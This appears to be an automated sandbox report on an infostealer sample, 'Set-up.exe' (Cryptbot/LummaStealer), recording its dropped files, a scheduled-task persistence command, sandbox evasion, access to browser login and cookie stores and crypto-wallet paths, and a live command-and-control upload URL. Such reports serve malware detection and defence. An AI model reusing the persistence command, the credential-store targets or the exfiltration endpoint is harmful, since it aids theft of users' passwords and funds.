Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: womwwurzvwrfdpojkxbm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: womwwurzvwrfdpojkxbm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: womwwurzvwrfdpojkxbm.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 9988096 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c3800
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_008F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_008F8230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: WomwWuRzvwrFDpojKxBm.dll.0.dr	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008FA521 push es; iretd	5_2_008FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D8C2A push edx; mov dword ptr [esp], ebx	5_2_6C2D8C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C304DB0 push eax; mov dword ptr [esp], ebx	5_2_6C305018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E4DC1 push eax; mov dword ptr [esp], ebx	5_2_6C2E4DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D6E03 push edx; mov dword ptr [esp], ebx	5_2_6C2D6E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E4FA1 push eax; mov dword ptr [esp], ebx	5_2_6C2E4FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C30E860 push eax; mov dword ptr [esp], ebx	5_2_6C30E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E285C push edx; mov dword ptr [esp], ebx	5_2_6C2E2870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E0852 push eax; mov dword ptr [esp], ebx	5_2_6C2E0866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2F8850 push eax; mov dword ptr [esp], ebx	5_2_6C2F8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3129A0 push eax; mov dword ptr [esp], ebx	5_2_6C312CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3129A0 push edx; mov dword ptr [esp], ebx	5_2_6C312CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3409E0 push eax; mov dword ptr [esp], edi	5_2_6C340B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C30EAC0 push eax; mov dword ptr [esp], ebx	5_2_6C30EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E4BE1 push eax; mov dword ptr [esp], ebx	5_2_6C2E4BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C320460 push eax; mov dword ptr [esp], ebx	5_2_6C3207FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D0452 push eax; mov dword ptr [esp], ebx	5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E8451 push 890005EAh; ret	5_2_6C2E8459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D04AD push eax; mov dword ptr [esp], ebx	5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D64A3 push edx; mov dword ptr [esp], ebx	5_2_6C2D64B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D04BE push eax; mov dword ptr [esp], ebx	5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2DA527 push eax; mov dword ptr [esp], ebx	5_2_6C2DA53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2B1AAA push eax; mov dword ptr [esp], ebx	5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2B1AAA push eax; mov dword ptr [esp], ebx	5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2DA6F7 push eax; mov dword ptr [esp], ebx	5_2_6C2DA70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2B6003 push eax; mov dword ptr [esp], ebx	5_2_6C366AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2B6003 push edx; mov dword ptr [esp], edi	5_2_6C366B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2B6098 push eax; mov dword ptr [esp], ebx	5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E40D5 push ecx; mov dword ptr [esp], ebx	5_2_6C2E40E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D81E5 push edx; mov dword ptr [esp], ebx	5_2_6C2D81F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D023B push eax; mov dword ptr [esp], ebx	5_2_6C2D0251

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\WomwWuRzvwrFDpojKxBm.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-160293

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-160294

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 785

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 7556	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7960	Thread sleep count: 785 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7960	Thread sleep time: -78500s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: Set-up.exe, 00000000.00000002.2053608610.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549539364.00000000017EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2053608610.00000000017AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: Set-up.exe	Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveScreenPalEpsonMcAfeeVALORANTtokendaoMultiBitHDbackupMinecraft Education EditionDaumMPC-BEVS Revo GrouppluginspypaCreativeThinkBuzanVMwareFree_PDF_SolutionsLenovoServiceBridgeNVIDIA CorporationNVIDIAMetroNichromeMegaDownloaderOISdictionariesuser_dataWindows MediaOneAuthTypeScriptODISVisualStudio ServicesVSApplicationInsightsVSCommonLogishrdNitroNCH SoftwareTempServiceHubAndroidbalena-etchermetaphantomstorage...Wind
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_008F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_008F8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_008F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_008F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_008F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_008F13C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C318280 cpuid

5_2_6C318280

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2036432764.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 7956, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: \Electrum\wallets
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.2053175297.0000000000F57000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: yFiveMWaves AudioISL Online CacheMega LimitedLogiShrdMEGAsyncupdatesSpotifyOperaOpera CryptodatabasesEthereum (UTC)\waves-clientOpera Software\Opera GX Stable\Exodus Eden\JaxxOpera Software\Opera Stable\bitboxOpera Software\Opera Developer\com.liberty.jaxxAuthy Desktop\Local Storage\leveldbOpera Software\Opera Nextatomic\Local Storage\leveldbOpera Software\Opera Crypto Stable\Ledger Live\@trezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\exodus.walletWindows Photo ViewerABBYYAMSDKmsedge.exebrave.exechrome.exe360ChromeX.exeslimjet.execatsxp.exeopera.exeCCleanerBrowser.exebrowser.exeAvastBrowser.exedragon.exeAVGBrowser.exevivaldi.exeSavespkgsOEMsrcjvmsPanasonicjava) (Version: )
Source: Set-up.exe	String found in binary or memory: \Jaxx
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: \Exodus Eden
Source: Set-up.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	45%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtvx17pt.top	185.244.181.140	true	true		unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
@sevtvx17pt.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
sevtvx17pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://sevtvx17pt.top/v1/upload.php	Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549539364.00000000017EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	WomwWuRzvwrFDpojKxBm.dll.0.dr	false	URL Reputation: safe	unknown
http://sevtvx17pt.top/	Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	Set-up.exe	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtvx17pt.top:80/v1/upload.phpoft	Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtvx17pt.top/Qv	Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.181.140	sevtvx17pt.top	Russian Federation		44901	BELCLOUDBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525760
Start date and time:	2024-10-04 14:43:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
